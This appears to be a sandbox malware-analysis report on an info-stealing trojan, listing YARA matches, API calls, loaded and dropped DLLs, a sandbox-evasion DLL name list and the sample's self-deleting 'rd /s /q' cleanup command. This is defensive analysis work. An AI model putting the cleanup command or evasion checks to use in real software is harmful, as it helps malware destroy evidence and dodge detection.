              Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
              Source: 0.2.file.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
              Source: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/26@1/2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC97030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,2_2_6CC97030
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_004111BE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004106C4 _EH_prolog,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,2_2_004106C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199689717899[1].htm
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3532:120:WilError_03
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
              Source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2476833209.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.dr, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
              Source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2476833209.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.dr, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2476833209.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.dr, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2476833209.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.dr, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
              Source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
              Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
              Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
              Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
              Source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
              Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
              Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2476833209.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.dr, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2476833209.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.dr, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
              Source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
              Source: GHJDBA.2.dr, FHDAFI.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
              Source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
              Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFCBGCGIJKJ" & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dlnashext.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wpdshext.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
              Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
              Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
              Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2476833209.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
              Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
              Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2476833209.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
              Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
              Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.dr
              Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00417645
              Source: freebl3.dll.2.drStatic PE information: section name: .00cfg
              Source: freebl3[1].dll.2.drStatic PE information: section name: .00cfg
              Source: mozglue.dll.2.drStatic PE information: section name: .00cfg
              Source: mozglue[1].dll.2.drStatic PE information: section name: .00cfg
              Source: sqls[1].dll.2.drStatic PE information: section name: .00cfg
              Source: msvcp140.dll.2.drStatic PE information: section name: .didat
              Source: msvcp140[1].dll.2.drStatic PE information: section name: .didat
              Source: nss3.dll.2.drStatic PE information: section name: .00cfg
              Source: nss3[1].dll.2.drStatic PE information: section name: .00cfg
              Source: softokn3.dll.2.drStatic PE information: section name: .00cfg
              Source: softokn3[1].dll.2.drStatic PE information: section name: .00cfg
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134964 push ecx; ret 0_2_00134977
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004191D5 push ecx; ret 2_2_004191E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC6B536 push ecx; ret 2_2_6CC6B549
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqls[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\DBFCBGCGIJKJ\vcruntime140.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\DBFCBGCGIJKJ\mozglue.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\DBFCBGCGIJKJ\nss3.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\DBFCBGCGIJKJ\msvcp140.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\DBFCBGCGIJKJ\softokn3.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\DBFCBGCGIJKJ\freebl3.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5768, type: MEMORYSTR
              Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
              Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
              Source: RegAsm.exeBinary or memory string: API_LOG.DLL
              Source: RegAsm.exe, 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqls[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\DBFCBGCGIJKJ\nss3.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\DBFCBGCGIJKJ\softokn3.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\DBFCBGCGIJKJ\freebl3.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dllJump to dropped file
